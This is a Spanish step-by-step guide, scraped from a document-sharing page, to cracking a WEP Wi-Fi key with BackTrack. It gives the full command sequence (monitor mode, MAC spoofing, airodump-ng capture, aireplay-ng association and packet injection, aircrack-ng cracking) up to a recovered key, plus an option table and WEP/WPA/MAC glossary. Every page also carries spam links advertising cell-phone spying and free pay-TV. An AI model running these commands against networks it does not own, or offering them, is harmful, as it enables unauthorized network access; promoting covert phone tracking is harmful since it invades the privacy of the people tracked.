12
Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com 3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv Antes que nada esta guía fue hecha con fines educativos para probar la seguridad de tu red inalámbrica. No me hago responsable de los malos usos que le den a esta información. Bienvenido a esta guía basica para el uso del software BackTrack con el cual aprenderás a poner a prueba la seguridad de una red WIFI con cifrado WEP. Antes que nada deben descargar esta aplicación gratuita, la encontraras en la siguiente página => http://www.backtrack-linux.org/downloads/ Solo hay que seleccionar lo que está en azul y dar click cuadro que marca la imagen La información está en el aire Así es, hoy en día todo viaja en el aire La comunicación telefónica El internet La televisión La radio Y si sabemos escuchar podemos acceder a toda la información que necesitemos, o podemos poner a prueba la seguridad con la que actualmente contamos y descubrir sus debilidades y mejorarlas para mantener a salvo nuestros datos y privacidad informática.

Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Embed Size (px)

Citation preview

Page 1: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Antes que nada esta guía fue hecha con fines educativos para probar la seguridad de tu red inalámbrica. No me hago responsable de los malos usos que le den a esta información.

Bienvenido a esta guía basica para el uso del software BackTrack con el cual aprenderás a poner a prueba la seguridad de una red WIFI con cifrado WEP.

Antes que nada deben descargar esta aplicación gratuita, la encontraras en la siguiente página

=> http://www.backtrack-linux.org/downloads/

Solo hay que seleccionar lo que está en azul y dar click cuadro que marca la imagen

La información está en el aire

Así es, hoy en día todo viaja en el aire La comunicación telefónica El internet La televisión La radio

Y si sabemos escuchar podemos acceder a toda la información que necesitemos, o podemos poner a prueba la seguridad con la que actualmente contamos y descubrir sus debilidades y mejorarlas para mantener a salvo nuestros datos y privacidad informática.

Page 2: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Que es BackTrack?

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y

relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la

comunidad que se mueve en torno a la seguridad informática.

Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la

evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de

Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.

Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de

puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la

auditoría Wireless. Fue incluida en el puesto 32 de la famosa lista "Top 100 Network Security Tools" de 2006.

Herramientas Backtrack le ofrece al usuario una extensa colección de herramientas completamente usables desde un Live CD o un Live USB por lo que no requiere una instalación para poder usarse. O bien, se ofrece la opción de instalar en un disco duro. Entre las herramientas ofrecidas se encuentran:

Aircrack-ng, Herramientas para auditoría inalámbrica Kismet, Sniffer inalámbrico Ettercap, Interceptor/Sniffer/Registrador para LAN Wireshark, Analizador de protocolos Medusa, herramienta para Ataque de fuerza bruta Nmap, rastreador de puertos

Y una larga lista de otras herramientas, que se agrupan en 11 familias:

Recopilación de Información Mapeo de Puertos Identificación de Vulnerabilidades Análisis de aplicaciones Web Análisis de redes de radio (WiFi, Bluetooth, RFID) Penetración (Exploits y Kit de herramientas de ingeniería social) Escalada de privilegios Mantenimiento de Acceso Forenses Ingeniería inversa Voz sobre IP

Cabe destacar que siempre se le pueden añadir más herramientas y software libre para desarrolladores de programación, herramientas de oficina, etc. Que originalmente no trae Backtrack, por otro lado también los creadores de esta distro pueden personalizar a gusto el backtrack.

Page 3: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Como ejecutar BackTrack?

Una vez descargado el ISO de BackTrack llego la hora de grabarlo en un DVD con alguna grabadora de imágenes,

O alguna otra aplicación por ejemplo PowerISO, es una forma fácil y rápida de iniciar la aplicación de BackTrack en un DVD.

Si no se cuenta con una unidad para quemar o leer DVD tenemos esta otra opción la cual es por medio de una

memoria USB.

Se necesita una memoria USB mínimo de 4GB sin ningún archivo en ella.

Una aplicación llamada Unetbootin (Universal Netboot Installer) es una software multiplataforma que permite la

instalación de varias distribuciones GNU/Linux desde una memoria USB o desde un disco duro USB sin necesidad de

usar un CD o DVD.

Lo pueden descargar gratis de aquí=> http://unetbootin.sourceforge.net/

Configuramos le damos aceptar y esperamos a que termine tomara como 15 minutos

Page 4: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Para iniciar des la USB debemos seleccionar la unidad, al encenderla y muestre la marca de la PC debemos presionar la tecla F9 o F12,

o configurar el bios para que inicie desde la memoria primero con F10 ingresamos en el.

El programa iniciara y se verá la siguiente pantalla

Aquí una descripción de sus botones

Page 5: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Una vez iniciado hay que darle click al icono de Shell y esperar que abra la ventana en la cual escribiremos el siguiente comando=>

setxkbmap es

Con ese comando haremos que el teclado cambie a español, con el cual cada tecla mostrara los signos correspondientes a su posición

como lo son: - ¿ ’ ¡ ? $ % * [ etc.

Preparación

Ahora continuaremos con la preparación, vamos a escribir los siguientes comandos para configurar nuestra tarjeta de red en modo

monitor:

root@bt:-# airmon-ng start wlan0

root@bt:-# ifconfig mon0 down

root@bt:-# macchanger - -m 00:11:22:33:44:55 mon0

root@bt:-# ifconfig mon0 up

root@bt:-# airodump-ng mon0

Enter despues de cada linea

Escaneo

Despues de escribir y dar Enter a el último comando de la sección de preparación, la pantalla debe de mostrar una imagen como la

siguiente, en donde nos mostrara las redes disponibles para iniciar el monitoreo de la que sea, para detener el escaneo se debe presionar

las siguientes teclas=> CTRL+C

Page 6: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Selección

Ahora lo siguiente es, una vez identificado nuestro modem para probar su seguridad, debemos poner atención en el BSSID y CH. BSSID = mac del modem CH = canal del modem Seleccionamos el BSSID y lo copiamos con click derecho y memorizamos el CH. Y debemos ir a file o archivo, y darle click a la pestaña de new tap, al hacer eso crearemos una nueva pestaña en la cual escribiremos el siguiente comando

root@bt:-# airodump-ng –c (canal del modem) –w (nombre al archivo que crearemos) - -bssid (mac del modem) mon0

Guardado de tráfico

Despues de darle Enter al comando anterior se comenzara a guardar todo el tráfico de datos generado,

Asociarnos al modem

Nuevamente debemos ir a file o archivo, y darle click a la pestaña de new tap, al hacer eso crearemos una nueva pestaña en la cual escribiremos el siguiente comando.

root@bt:-# aireplay-ng -1 6000 -a (mac del modem) -h (nuestra mac) mon0

Page 7: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Una vez dado Enter al comando anterior se comenzara a ver una actividad como se muestra en la siguiente imagen.

Acelerando el tráfico de datos

Nuevamente debemos ir a file o archivo, y darle click a la pestaña de new tap, al hacer eso crearemos una nueva pestaña en la cual escribiremos el siguiente comando.

root@bt:-# aireplay-ng -2 -p 0841 –c ff:ff:ff:ff:ff:ff –b (mac del modem) -h (nuestra mac) mon0

Page 8: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Una vez dado Enter al comando anterior se comenzara a ver una actividad como en la siguiente imagen se muestra:

Nos preguntara si deseamos usar el paquete?

Verificamos que la BSSID corresponda a la mac del modem le damos y y después Enter.

Y se verá una actividad como la siguiente

Page 9: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Ahora solo queda esperar

Regresamos a la pestaña 2 donde veremos como el valor de #data comienza a aumentar, las probabilidades de

obtener la clave WEP es cuando el valor supera los 5000.

El ataque de descifrado

Nuevamente debemos ir a file o archivo, y darle click a la pestaña de new tap, al hacer eso crearemos una nueva pestaña en la cual escribiremos el siguiente comando.

root@bt:-# aircrack-ng (nombre que le asignamos al archivo al inicio de la pestaña 2 )-01.cap

y damos Enter

Faltan

Aunque las probabilidades aumentan al superar el valor de 5000 en #DATA no siempre es suficiente como lo

muestra la siguiente imagen.

Aquí muestra que fallo y que se debe intentar con 10000.

Page 10: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Nuevo intento

Presionamos ctrl+c

Luego tecla arriba para que aparezca el último comando y volveremos a dar Enter

KEY FOUND! [ 76:13:55:51:97 ]

Éxito la clave para este modem es: 7613555197

Todos los datos capturados son guardados en esta carpeta los puedes eliminar sin afectar nada

una vez descifrada la clave

Espero haberlos ayudado y la lección de todo esto es: cambiar su clave a WPA

Page 11: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

Otra cosa que pueden hacer es activar el filtro de mac en la configuración inalámbrica de su modem

Option Param. Descripción

-a amode Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA/WPA2-PSK).

-e essid Si se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Está opción es necesaria para crackear claves

WPA/WPA2-PSK si el ESSID está oculto.

-b bssid Selecciona el AP objetivo basándose en la dirección MAC.

-p nbcpu En sistemas SMP, especifica con esta opción el número de CPUs usadas.

-q none Activa el modo silencioso (no muestra ninguna salida hasta que encuentra o no la clave).

-c none (WEP cracking) Limita la búsqueda únicamente a caracteres alfanuméricos (0x20 - 0x7F).

-t none (WEP cracking) Limita la búsqueda únicamente a caracteres hexadecimales codificados en binario.

-h none (WEP cracking) Limita la búsqueda únicamente a caracteres numéricos (0x30-0x39). Estas claves numéricas son utilizadas por

defecto por muchos APs y muchas compañias de ADSL.

-d start (WEP cracking) Especifica el comienzo de la clave WEP (en hexadecimal).

-m maddr (WEP cracking) Dirección MAC para la que filtrar los paquetes de datos WEP. Alternativamente, se puede especificar -m

ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, sin preocuparnos de la red.

-n nbits (WEP cracking) Especifica la longitud de la clave: 64 para WEP de 40-bit, 128 para WEP de 104-bit, etc. La opción por defecto es

128.

-i index (WEP cracking) Guarda solo los IVs que tienen este índice de clave (1 to 4). La opción predeterminada es ignorar el índice de clave.

-f fudge (WEP cracking) Por defecto, esta opción está fijada en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor más

alto para para elevar el nivel de fuerza bruta: la obtención de la clave llevará más tiempo, pero la probabilidad de éxito será mayor.

-k korek (WEP cracking) Hay 17 ataques korek de tipo estadístico. Algunas veces un ataque crea un falso positivo que evita que encontremos

la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques.

-x/-x0 none (WEP cracking) No aplicar fuerza bruta sobre los dos últimos bytes de la clave (keybytes).

-x1 none (WEP cracking) Aplicar fuerza bruta sobre el último byte de la clave (opción por defecto).

-x2 none (WEP cracking) Aplicar fuerza bruta sobre los dos últimos bytes.

-X none (WEP cracking) No aplicar fuerza bruta con multiprocesadores (solo sistemas SMP).

-y none (WEP cracking) Éste es un ataque de fuerza bruta experimental, que solo debe ser usado cuando el ataque estandard falle con más de

un millón de IVs

-w words (WPA cracking) Ruta al diccionario.

BSSID

Dirección MAC del punto de acceso.

PWR

Nivel de señal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estación la señal

aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de señal.

Beacons

Número de paquetes-anuncio enviados por el AP. Cada punto de acceso envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo que

normalmente pueden ser recogidos desde muy lejos.

# Data

Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs), incluyendo paquetes de datos de difusión general.

CH

Número de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se esté alternando entre

canales debido a las interferencias de radiofrecuencia.

MB

Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b+ y velocidades mayores son 802.11g.

ENC

Algoritmo de encriptación en uso. OPN = sin encriptación, "WEP?" = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP

(sin la interrogación) indica WEP estática o dinámica, y WPA si TKIP o CCMP están presentes.

ESSID

Conocida como "SSID", puede estar vacía si el ocultamiento de SSID está activo. En este caso airodump-ng tratará de recuperar el SSID de las respuestas

a escaneos y las peticiones de asociación.

STATION

Dirección MAC de cada estación asociada. En la captura de más arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).

IVS

En criptografía, se refiere a un vector de inicialización (conocido por sus siglas en inglés IV) es un bloque de bits que es requerido para permitir un cifrado

en flujo o un cifrado por bloques

Nota: podemos encontrar algunas variaciones según las versiones, pero lo fundamental siempre es lo mismo, que son los datos que hemos definido.

Page 12: Te Regalo-Guia Para Descifrar Una Clave Wep Paso a Paso

Todo viaja en el aire solo hay que saber escuchar Guía para probar la seguridad de una red WIFI

Espia o rastrea un celular con http://espiadecelular.weebly.com trucos para descifrar claves WEP http://clavewep.blogspot.com

3500 canales de tv en tu computadora sin pagos mensuales http://tinyurl.com/mybesttv

WEP WEP, acrónimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estándar IEEE

802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en

el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits

del IV). Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las

redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una

confidencialidad comparable a la de una red tradicional cableada.

Comenzando en 2001, varias debilidades serias fueron identificadas por analistas criptográficos. Como consecuencia, hoy en día una

protección WEP puede ser violada con software fácilmente accesible en pocos minutos. Unos meses más tarde el IEEE creó la nueva

corrección de seguridad 802.11i para neutralizar los problemas. Hacia 2003, la Alianza Wi-Fi anunció que WEP había sido reemplazado

por Wi-Fi Protected Access (WPA). Finalmente en 2004, con la ratificación del estándar completo 802.11i (conocido como WPA2), el

IEEE declaró que tanto WEP-40 como WEP-104 fueron revocados por presentar fallos en su propósito de ofrecer seguridad. A pesar de sus

debilidades, WEP sigue siendo utilizado, ya que es a menudo la primera opción de seguridad que se presenta a los usuarios por las

herramientas de configuración de los routers aún cuando sólo proporciona un nivel de seguridad que puede disuadir del uso sin autorización

de una red privada, pero sin proporcionar verdadera protección. Fue desaprobado como un mecanismo de privacidad inalámbrico en 2004,

pero todavía está documentado en el estándar actual.

WEP es a veces interpretado erróneamente como Wireless Encryption Protocol.

WPA

Wi-Fi Protected Access, llamado también WPA (en español «Acceso Wi-Fi protegido») es un sistema para proteger las redes inalámbricas

(Wi-Fi); creado para corregir las deficiencias del sistema previo, Wired Equivalent Privacy (WEP). Los investigadores han encontrado

varias debilidades en el algoritmo WEP (tales como la reutilización del vector de inicialización (IV), del cual se derivan ataques

estadísticos que permiten recuperar la clave WEP, entre otros). WPA implementa la mayoría del estándar IEEE 802.11i, y fue creado como

una medida intermedia para ocupar el lugar de WEP mientras 802.11i era finalizado. WPA fue creado por The Wi-Fi Alliance («La alianza

Wi-Fi»).

WPA adopta la autenticación de usuarios mediante el uso de un servidor, donde se almacenan las credenciales y contraseñas de los usuarios

de la red. Para no obligar al uso de tal servidor para el despliegue de redes, WPA permite la autenticación mediante una clave

precompartida, que de un modo similar al WEP, requiere introducir la misma clave en todos los equipos de la red.

Una falla encontrada en la característica agregada al Wi-Fi llamada Wi-Fi Protected Setup (también bajo el nombre de QSS) permite

eludir la seguridad e infiltrarse en las redes que usan los protocolos WPA y WPA2.

MAC

En las redes de computadoras, la dirección MAC (siglas en inglés de media access control; en español "control de acceso al medio") es un

identificador de 48 bits (6 bloques hexadecimales) que corresponde de forma única a una tarjeta o dispositivo de red. Se conoce también

como dirección física, y es única para cada dispositivo. Está determinada y configurada por el IEEE (los últimos 24 bits) y el fabricante

(los primeros 24 bits) utilizando el organizationally unique identifier. La mayoría de los protocolos que trabajan en la capa 2 del modelo

OSI usan una de las tres numeraciones manejadas por el IEEE: MAC-48, EUI-48, y EUI-64, las cuales han sido diseñadas para ser

identificadores globalmente únicos. No todos los protocolos de comunicación usan direcciones MAC, y no todos los protocolos requieren

identificadores globalmente únicos.

Las direcciones MAC son únicas a nivel mundial, puesto que son escritas directamente, en forma binaria, en el hardware en su momento de

fabricación. Debido a esto, las direcciones MAC son a veces llamadas burned-in addresses, en inglés.

Si nos fijamos en la definición como cada bloque hexadecimal son 8 dígitos binarios (bits), tendríamos:

6 * 8 = 48 bits únicos

En la mayoría de los casos no es necesario conocer la dirección MAC, ni para montar una red doméstica, ni para configurar la conexión a

internet, usándose esta sólo a niveles internos de la red. Sin embargo, es posible añadir un control de hardware en un conmutador o un

punto de acceso inalámbrico, para permitir sólo a unas MAC concretas el acceso a la red. En este caso, deberá saberse la MAC de los

dispositivos para añadirlos a la lista. Dicho medio de seguridad se puede considerar un refuerzo de otros sistemas de seguridad, ya que

teóricamente se trata de una dirección única y permanente, aunque en todos los sistemas operativos hay métodos que permiten a las tarjetas

de red identificarse con direcciones MAC distintas de la real.

La dirección MAC es utilizada en varias tecnologías entre las que se incluyen:

Ethernet

802.3 CSMA/CD

802.5 o redes en anillo a 4 Mbps o 16 Mbps

802.11 redes inalámbricas (Wi-Fi).

Asynchronous Transfer Mode MAC opera en la capa 2 del modelo OSI, encargada de hacer fluir la información libre de errores entre dos máquinas conectadas

directamente. Para ello se generan tramas, pequeños bloques de información que contienen en su cabecera las direcciones MAC

correspondiente al emisor y receptor de la información.